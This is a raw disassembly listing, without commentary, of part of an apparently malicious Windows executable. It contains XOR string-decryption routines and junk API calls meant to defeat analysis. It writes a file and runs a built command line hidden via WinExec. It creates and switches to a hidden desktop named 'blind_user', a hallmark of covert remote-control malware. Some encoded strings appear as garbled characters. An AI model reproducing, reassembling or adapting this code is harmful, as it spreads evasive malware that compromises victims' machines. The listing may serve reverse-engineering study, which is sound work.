push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
lea edi, [ebp+var_14B3]
lea esi, byte_442211
mov ecx, 7
rep movsb
push 0Fh ; Size
push offset word_4474BA ; Src
call sub_403FD8
lea edi, [ebp+Buffer]
push edi
push eax ; Format
lea edi, [ebp+Dest]
push edi ; Dest
call sprintf ; sprintf
push 0Ah ; Size
push offset byte_4474AF ; Src
call sub_403FD8
lea edi, [ebp+Buffer]
push edi
push eax ; Format
lea edi, [ebp+FileName]
push edi ; Dest
call sprintf ; sprintf
push 8 ; Size
push offset word_4474A6 ; Src
call sub_403FD8
push eax ; Source
lea edi, [ebp+Buffer]
push edi ; Dest
call strcat ; strcat
add esp, 38h
jmp loc_404233
; ---------------------------------------------------------------------------
loc_4041A4: ; CODE XREF: sub_40406B+A9�j
call GetLastError
push 0FFh ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call GetWindowsDirectoryA ; GetWindowsDirectoryA
call IsDebuggerPresent ; IsDebuggerPresent
push 0Fh ; Size
push offset word_447496 ; Src
call sub_403FD8
lea edi, [ebp+Buffer]
push edi
push eax ; Format
lea edi, [ebp+Dest]
push edi ; Dest
call sprintf ; sprintf
call GetVersion ; GetVersion
push 0Eh ; Size
push offset byte_447487 ; Src
call sub_403FD8
lea edi, [ebp+Buffer]
push edi
push eax ; Format
lea edi, [ebp+FileName]
push edi ; Dest
call sprintf ; sprintf
lea edi, [ebp+var_14AF]
lea esi, byte_442218
mov ecx, 3
rep movsb
push 0Ch ; Size
push offset word_44747A ; Src
call sub_403FD8
push eax ; Source
lea edi, [ebp+Buffer]
push edi ; Dest
call strcat ; strcat
add esp, 38h
loc_404233: ; CODE XREF: sub_40406B+134�j
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
call GetProcessHeap ; GetProcessHeap
lea edi, [ebp+var_14A4]
lea esi, byte_44221B
mov ecx, 7
rep movsb
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+Dest]
push eax ; lpFileName
call CreateFileA ; CreateFileA
mov ebx, eax
call GetVersion ; GetVersion
push 39h ; Size
push offset dword_447440 ; Src
call sub_403FD8
lea edi, [ebp+Dest]
push edi
lea edi, [ebp+Filename]
push edi
lea edi, [ebp+Filename]
push edi
push eax ; Format
lea edi, [ebp+CmdLine]
push edi ; Dest
call sprintf ; sprintf
add esp, 1Ch
call GetTickCount ; GetTickCount
lea ecx, [ebp+CmdLine]
or eax, 0FFFFFFFFh
loc_4042BB: ; CODE XREF: sub_40406B+255�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4042BB
push 0 ; lpOverlapped
lea esi, [ebp+NumberOfBytesWritten]
push esi ; lpNumberOfBytesWritten
push eax ; nNumberOfBytesToWrite
lea edi, [ebp+CmdLine]
push edi ; lpBuffer
push ebx ; hFile
call WriteFile ; WriteFile
call GetLastError
push ebx ; hObject
call CloseHandle ; CloseHandle
mov eax, dword_442222
mov [ebp+var_14AC], eax
push 8 ; Size
push offset aSS ; "¿éºµÙº¿é"
call sub_403FD8
add esp, 8
lea edi, [ebp+Dest]
push edi
lea edi, [ebp+Buffer]
push edi
push eax ; Format
lea edi, [ebp+CmdLine]
loc_404313: ; DATA XREF: sub_43F725+1E1�o
push edi ; Dest
call sprintf ; sprintf
add esp, 10h
push 0 ; uCmdShow
lea eax, [ebp+CmdLine]
push eax ; lpCmdLine
call WinExec ; WinExec
mov [ebp+var_1395], 69h
add [ebp+var_1395], 1
pop edi
pop esi
pop ebx
leave
retn
sub_40406B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 200h
push esi
push dword ptr [ebp+8]
mov eax, dword_442230
lea eax, ds:430C30h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-8], 100h
xor edi, edi
jmp short loc_40438C
; ---------------------------------------------------------------------------
loc_404372: ; CODE XREF: .text:0040438E�j
mov eax, dword_442230
add eax, edi
lea eax, ds:430C30h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_40438C: ; CODE XREF: .text:00404370�j
cmp edi, esi
jl short loc_404372
mov eax, dword_442230
add eax, esi
mov byte ptr dword_430C30[eax], 0
xor edi, edi
mov edi, dword_442230
mov eax, edi
lea eax, [eax+esi+1]
mov dword_442230, eax
cmp eax, 0DCCh
jle short loc_4043C0
and dword_442230, 0
loc_4043C0: ; CODE XREF: .text:004043B7�j
lea eax, dword_430C30[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043CA proc near ; CODE XREF: sub_4061F7+22C�p
; sub_408B4C+1AB�p
var_10 = dword ptr -10h
var_A = word ptr -0Ah
var_7 = byte ptr -7
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea edi, [ebp+var_7]
lea esi, dword_442238
mov ecx, 3
rep movsb
cmp hDesktop, 0
jz short loc_404422
mov [ebp+var_A], 4080h
movzx eax, [ebp+var_A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_A], ax
call GetCurrentThreadId ; GetCurrentThreadId
push eax ; dwThreadId
call GetThreadDesktop ; GetThreadDesktop
mov [ebp+var_10], eax
call GetProcessHeap ; GetProcessHeap
mov eax, hDesktop
cmp [ebp+var_10], eax
jnz short loc_404450
xor eax, eax
inc eax
jmp short loc_404469
; ---------------------------------------------------------------------------
loc_404422: ; CODE XREF: sub_4043CA+20�j
push 0 ; lpsa
push 0C7h ; dwDesiredAccess
push 0 ; dwFlags
push 0 ; pDevmode
push 0 ; lpszDevice
push offset szDesktop ; "blind_user"
call CreateDesktopA ; CreateDesktopA
mov hDesktop, eax
call GetCurrentThreadId ; GetCurrentThreadId
cmp hDesktop, 0
jnz short loc_404450
xor eax, eax
jmp short loc_404469
; ---------------------------------------------------------------------------
loc_404450: ; CODE XREF: sub_4043CA+51�j
; sub_4043CA+80�j
push hDesktop ; hDesktop
call SetThreadDesktop ; SetThreadDesktop
mov [ebp+var_4], eax
mov ebx, 5CBAh
mov ecx, ebx
add ecx, ebx
mov ebx, ecx
loc_404469: ; CODE XREF: sub_4043CA+56�j
; sub_4043CA+84�j
pop edi
pop esi
pop ebx
leave
retn
sub_4043CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40446E proc near ; CODE XREF: sub_4061F7+2C6�p
; sub_408B4C+230�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
mov edi, 1763h
add edi, 25D9h
mov eax, [ebp+arg_0]
lea edx, szDesktop ; "blind_user"
mov [eax+8], edx
call GetProcessHeap ; GetProcessHeap
pop edi
pop ebp
retn
sub_40446E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404491(void *Src, size_t Size)
sub_404491 proc near ; CODE XREF: sub_404529+64�p
; sub_404529+9A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_442244
lea eax, ds:4176F0h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_4], 5Dh
xor edi, edi
jmp short loc_4044D9
; ---------------------------------------------------------------------------
loc_4044BF: ; CODE XREF: sub_404491+4A�j
mov eax, dword_442244
add eax, edi
lea eax, ds:4176F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0B6h
mov [eax], dl
inc edi
loc_4044D9: ; CODE XREF: sub_404491+2C�j
cmp edi, esi
jl short loc_4044BF
mov eax, dword_442244
add eax, esi
mov byte ptr dword_4176F0[eax], 0
xor edi, edi
mov edi, dword_442244
add dword_442244, 2
mov eax, dword_442244
add eax, 5
add eax, esi
mov dword_442244, eax
cmp eax, 0DD3h
jle short loc_404518
and dword_442244, 0
loc_404518: ; CODE XREF: sub_404491+7E�j
mov [ebp+var_8], 165h
lea eax, dword_4176F0[edi]
loc_404525: ; DATA XREF: sub_43F725+A6�o
pop edi
pop esi
leave
retn
sub_404491 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404529(char *Dest, char *Source)
sub_404529 proc near ; CODE XREF: sub_4054C8+702�p
; sub_4054C8+7C6�p ...
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
Format = dword ptr -108h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
Dest = dword ptr 8
Source = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 114h
push ebx
push esi
push edi
mov ebx, [ebp+Dest]
call GetCurrentThreadId ; GetCurrentThreadId
push [ebp+Source] ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 8
call IsDebuggerPresent ; IsDebuggerPresent
lea edi, [ebp+var_100]
lea esi, byte_442248
xor ecx, ecx
inc ecx
rep movsb
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404641
call GetProcessHeap ; GetProcessHeap
mov [ebp+var_FF], 0
call GetLastError
loc_404586: ; DATA XREF: sub_43F725+476�o
push 3 ; Size
push offset aSC ; "™œ–"
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
call GetProcessHeap ; GetProcessHeap
mov [ebp+var_101], 0
jmp short loc_404605
; ---------------------------------------------------------------------------
loc_4045AA: ; CODE XREF: sub_404529+E4�j
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_4045FE
push 4 ; Size
push offset aUU ; "“Å“Õ"
call sub_404491
mov [ebp+Format], eax
call rand ; rand
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+Format]
push edi ; Format
loc_4045EF: ; DATA XREF: sub_43F725+4B8�o
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
loc_4045FE: ; CODE XREF: sub_404529+91�j
add [ebp+var_101], 1
loc_404605: ; CODE XREF: sub_404529+7F�j
mov al, [ebp+var_101]
cmp al, 0Ah
jb short loc_4045AA
call GetCurrentThreadId ; GetCurrentThreadId
lea eax, [ebp+var_FF]
push eax ; Source
push ebx ; Dest
call strcat ; strcat
call IsDebuggerPresent ; IsDebuggerPresent
push 3 ; Size
push offset aCS ; "–œ™"
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 18h
call IsDebuggerPresent ; IsDebuggerPresent
loc_404641: ; CODE XREF: sub_404529+46�j
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404721
call GetCurrentThreadId ; GetCurrentThreadId
push 10h ; Size
push offset aCuUUClcuN ; "À×Ä–“Õ“Õ“Õ–‹–“Ã"
call sub_404491
mov [ebp+Format], eax
call rand ; rand
mov [ebp+var_10C], eax
call rand ; rand
mov [ebp+var_110], eax
call rand ; rand
mov [ebp+var_114], eax
call rand ; rand
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp+var_114]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_110]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_10C]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+Format]
push edi ; Format
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
mov [ebp+var_101], 80h
add [ebp+var_101], 1
lea eax, [ebp+var_FF]
push eax ; Source
push ebx ; Dest
call strcat ; strcat
loc_40470D: ; DATA XREF: sub_43F725+600�o
add esp, 28h
lea edi, [ebp+var_102]
lea esi, byte_442249
xor ecx, ecx
inc ecx
rep movsb
loc_404721: ; CODE XREF: sub_404529+128�j
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_4047EE
mov [ebp+var_101], 6Ch
movzx eax, [ebp+var_101]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_101], al
push 0Ah ; Size
push offset byte_447403 ; Src
call sub_404491
mov [ebp+Format], eax
call rand ; rand
mov [ebp+var_10C], eax
call rand ; rand
mov [ebp+var_110], eax
call rand ; rand
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_110]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
loc_40479E: ; DATA XREF: sub_43F725+502�o
add edi, 61h
push edi
mov edi, [ebp+var_10C]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+Format]
push edi ; Format
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
mov [ebp+var_102], 0ABh
sub [ebp+var_102], 19h
lea eax, [ebp+var_FF]
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 24h
call IsDebuggerPresent ; IsDebuggerPresent
loc_4047EE: ; CODE XREF: sub_404529+208�j
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404816
push 2 ; Size
push offset byte_447400 ; Src
loc_404807: ; DATA XREF: sub_43F725+52D�o
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404816: ; CODE XREF: sub_404529+2D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_404529 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40481B(char *Dest, char *Source)
sub_40481B proc near ; CODE XREF: sub_4054C8+1A2�p
; sub_4054C8+1D3�p ...
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
Format = dword ptr -148h
var_141 = byte ptr -141h
var_13F = byte ptr -13Fh
var_13B = byte ptr -13Bh
var_136 = word ptr -136h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_129 = byte ptr -129h
var_128 = byte ptr -128h
var_120 = byte ptr -120h
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
Dest = dword ptr 8
Source = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 150h
push ebx
push esi
push edi
mov ebx, [ebp+Dest]
mov [ebp+var_108], 53AAh
inc [ebp+var_108]
push [ebp+Source] ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 8
lea edi, [ebp+var_120]
lea esi, word_44224A
movsd
movsd
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404A43
call GetProcessHeap ; GetProcessHeap
mov [ebp+var_FF], 0
mov [ebp+var_130], 55F4h
inc [ebp+var_130]
push 5 ; Size
push offset word_4473FA ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
call GetVersion ; GetVersion
mov [ebp+var_129], 0
jmp loc_4049F9
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_40481B+1E6�j
call GetCurrentThreadId ; GetCurrentThreadId
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404906
push 4 ; Size
push offset aUU ; "“Å“Õ"
call sub_404491
mov [ebp+Format], eax
call rand ; rand
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+Format]
push edi ; Format
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
loc_404906: ; CODE XREF: sub_40481B+A7�j
lea edi, [ebp+var_13B]
lea esi, aByqv ; "BYQV"
mov ecx, 5
rep movsb
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40496D
push 4 ; Size
push offset aUU ; "“Å“Õ"
call sub_404491
mov [ebp+var_14C], eax ; DATA XREF: sub_43F725+41D�r
call rand ; rand
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_14C]
push edi ; Format
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
loc_40496D: ; CODE XREF: sub_40481B+10E�j
lea edi, [ebp+var_141]
lea esi, a4lk ; "&*4LK"
mov ecx, 3
rep movsw
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 7
jge short loc_4049D5
push 4 ; Size
push offset aUU ; "“Å“Õ"
call sub_404491
mov [ebp+var_150], eax
call rand ; rand
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_150]
push edi ; Format
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
loc_4049D5: ; CODE XREF: sub_40481B+176�j
mov [ebp+var_136], 61C9h
movzx eax, [ebp+var_136]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_136], ax ; DATA XREF: sub_43F725+2A�o
add [ebp+var_129], 1
loc_4049F9: ; CODE XREF: sub_40481B+8D�j
mov al, [ebp+var_129]
cmp al, 0Ah
jb loc_4048AD
lea eax, [ebp+var_FF]
push eax ; Source
push ebx ; Dest
call strcat ; strcat
call GetCurrentProcessId ; GetCurrentProcessId
push 4 ; Size
push offset byte_4473F5 ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 18h
mov [ebp+var_134], 46D8h ; DATA XREF: sub_440126+12�o
sub [ebp+var_134], 3C21h
loc_404A43: ; CODE XREF: sub_40481B+49�j
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404BD4
mov [ebp+var_130], 53ABh
add [ebp+var_130], 4F65h
mov [ebp+var_FF], 0
mov eax, dword_44225D
mov [ebp+var_134], eax
mov [ebp+var_129], 0
jmp loc_404BB6
; ---------------------------------------------------------------------------
loc_404A8B: ; CODE XREF: sub_40481B+3A3�j
call GetProcessHeap ; GetProcessHeap
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404AE4
push 4 ; Size
push offset aUU ; "“Å“Õ"
call sub_404491
mov [ebp-144h], eax
call rand ; rand
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp-144h]
push edi ; Format
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
loc_404AE4: ; CODE XREF: sub_40481B+285�j
mov eax, dword_442261
mov [ebp-138h], eax
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404B43
push 4 ; Size
push offset aUU ; "“Å“Õ"
call sub_404491
mov [ebp+Format], eax
call rand ; rand
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+Format]
push edi ; Format
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
loc_404B43: ; CODE XREF: sub_40481B+2E4�j
lea edi, [ebp+var_13F]
lea esi, byte_442265
mov ecx, 7
rep movsb
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 3
jge short loc_404BAA
push 4 ; Size
push offset aUU ; "“Å“Õ"
call sub_404491
mov [ebp+var_14C], eax
call rand ; rand
mov ecx, 9
cdq
loc_404B85: ; DATA XREF: .text:00440382�o
; .text:004403A9�o ...
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_14C]
push edi ; Format
lea edi, [ebp+var_FF]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
loc_404BAA: ; CODE XREF: sub_40481B+34B�j
call GetTickCount ; GetTickCount
add [ebp+var_129], 1
loc_404BB6: ; CODE XREF: sub_40481B+26B�j
mov al, [ebp+var_129]
cmp al, 32h
jb loc_404A8B
lea eax, [ebp+var_FF]
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 8
loc_404BD4: ; CODE XREF: sub_40481B+238�j
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404BFC
push 4 ; Size
push offset dword_4473F0 ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404BFC: ; CODE XREF: sub_40481B+3C9�j
lea edi, [ebp+var_128]
lea esi, dword_44226C
movsd
movsd
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404C32
push 3 ; Size
push offset dword_4473EC ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404C32: ; CODE XREF: sub_40481B+3FF�j
mov [ebp+var_104], 384h
mov eax, [ebp+var_104]
mov edx, eax
add edx, eax
mov [ebp+var_104], edx
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404C74
push 3 ; Size
push offset dword_4473E8 ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404C74: ; CODE XREF: sub_40481B+441�j
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404C9C
push 3 ; Size
push offset dword_4473E4 ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404C9C: ; CODE XREF: sub_40481B+469�j
call GetTickCount ; GetTickCount
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404CC9
push 4 ; Size
push offset byte_4473DF ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404CC9: ; CODE XREF: sub_40481B+496�j
mov [ebp+var_10C], 0F10h
inc [ebp+var_10C]
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D01
push 4 ; Size
push offset word_4473DA ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404D01: ; CODE XREF: sub_40481B+4CE�j
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D29
push 4 ; Size
push offset byte_4473D5 ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404D29: ; CODE XREF: sub_40481B+4F6�j
call GetTickCount ; GetTickCount
loc_404D2E: ; DATA XREF: .text:0043FFA8�o
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D56
push 7 ; Size
push offset byte_4473CD ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404D56: ; CODE XREF: sub_40481B+523�j
mov [ebp+var_110], 7CCAh
mov eax, 23D9h
mul [ebp+var_110]
mov [ebp-12Ch], eax
mov [ebp+var_110], eax
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D9F
push 8 ; Size
push offset dword_4473C4 ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404D9F: ; CODE XREF: sub_40481B+56C�j
mov [ebp+var_114], 2CE7h
inc [ebp+var_114]
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404DD7
push 9 ; Size
push offset word_4473BA ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404DD7: ; CODE XREF: sub_40481B+5A4�j
mov [ebp+var_118], 35B7h
mov eax, 4085h
mul [ebp+var_118]
mov [ebp+var_130], eax
mov [ebp+var_118], eax
call rand ; rand
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E20
push 2 ; Size
push offset byte_447400 ; Src
call sub_404491
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
loc_404E20: ; CODE XREF: sub_40481B+5ED�j
call GetCurrentProcessId ; GetCurrentProcessId
pop edi
pop esi
pop ebx
leave
retn
sub_40481B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404E2A(void *Src, size_t Size)
sub_404E2A proc near ; CODE XREF: sub_404EC6+5C�p
; sub_404EC6+91�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+Size]
mov [ebp+var_4], 12Bh
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_44227C
lea eax, ds:436250h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_8], 283h
xor edi, edi
jmp short loc_404E77
; ---------------------------------------------------------------------------
loc_404E60: ; CODE XREF: sub_404E2A+4F�j
mov eax, dword_44227C
add eax, edi
lea eax, ds:436250h[eax]
movsx edx, byte ptr [eax]
xor edx, 7Bh
mov [eax], dl
inc edi
loc_404E77: ; CODE XREF: sub_404E2A+34�j
cmp edi, esi
jl short loc_404E60
mov [ebp+var_C], 10Ch
mov eax, dword_44227C
add eax, esi
mov byte ptr dword_436250[eax], 0
xor edi, edi
mov edi, dword_44227C
add dword_44227C, 3
mov eax, dword_44227C
lea eax, [eax+esi+3]
mov dword_44227C, eax
cmp eax, 0DEDh
jle short loc_404EBC
and dword_44227C, 0
loc_404EBC: ; CODE XREF: sub_404E2A+89�j
lea eax, dword_436250[edi]
pop edi
pop esi
leave
retn
sub_404E2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404EC6(PSID pSid, LPSTR)
sub_404EC6 proc near ; CODE XREF: sub_40506F+99�p
var_30 = dword ptr -30h
var_2A = byte ptr -2Ah
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_19 = dword ptr -19h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
nSubAuthority = dword ptr -4
pSid = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_15], 0C0h
sub [ebp+var_15], 75h
mov eax, dword_442280
mov [ebp+var_19], eax
xor ebx, ebx
inc ebx
push [ebp+pSid] ; pSid
call GetSidIdentifierAuthority ; GetSidIdentifierAuthority
mov [ebp+var_14], eax
call GetCurrentThreadId ; GetCurrentThreadId
push [ebp+pSid] ; pSid
call GetSidSubAuthorityCount ; GetSidSubAuthorityCount
movzx edi, byte ptr [eax]
mov [ebp+var_10], edi
call GetTickCount ; GetTickCount
mov eax, 0Ch
mul [ebp+var_10]
mov [ebp+var_20], eax
add eax, 1Ch
mov [ebp+var_C], eax
loc_404F16: ; DATA XREF: .text:off_4472A3�o
call GetTickCount ; GetTickCount
push 6 ; Size
push offset byte_4473B3 ; Src
call sub_404E2A
push ebx
push eax ; LPCSTR
push [ebp+arg_4] ; LPSTR
call wsprintfA ; wsprintfA
add esp, 14h
mov [ebp+var_C], eax
add eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_14]
cmp byte ptr [eax], 0
jnz short loc_404F4B
cmp byte ptr [eax+1], 0
jz short loc_404FA9
loc_404F4B: ; CODE XREF: sub_404EC6+7D�j
call GetCurrentProcessId ; GetCurrentProcessId
push 20h ; Size
push offset word_447392 ; Src
call sub_404E2A
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx esi, si
push esi
movzx esi, byte ptr [edi+4]
movzx esi, si
push esi
movzx esi, byte ptr [edi+3]
movzx esi, si
push esi
movzx esi, byte ptr [edi+2]
movzx esi, si
push esi
movzx esi, byte ptr [edi+1]
movzx esi, si
push esi
movzx edi, byte ptr [edi]
movzx edi, di
push edi
push eax ; LPCSTR
push [ebp+var_8] ; LPSTR
call wsprintfA ; wsprintfA
add esp, 28h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
jmp short loc_405017
; ---------------------------------------------------------------------------
loc_404FA9: ; CODE XREF: sub_404EC6+83�j
mov [ebp+var_24], 5F0h
mov eax, 4B0Ah
mul [ebp+var_24]
mov [ebp+var_30], eax
mov [ebp+var_24], eax
push 3 ; Size
push offset word_44738E ; Src
call sub_404E2A
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx edx, byte ptr [edi+4]
shl edx, 8
add esi, edx
movzx edx, byte ptr [edi+3]
shl edx, 10h
add esi, edx
movzx edi, byte ptr [edi+2]
shl edi, 18h
add esi, edi
push esi
push eax ; LPCSTR
push [ebp+var_8] ; LPSTR
call wsprintfA ; wsprintfA
add esp, 14h
mov ebx, eax
lea edi, [ebp+var_2A]
lea esi, dword_442284
mov ecx, 3
rep movsw
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
loc_405017: ; CODE XREF: sub_404EC6+E1�j
and [ebp+nSubAuthority], 0
jmp short loc_405062
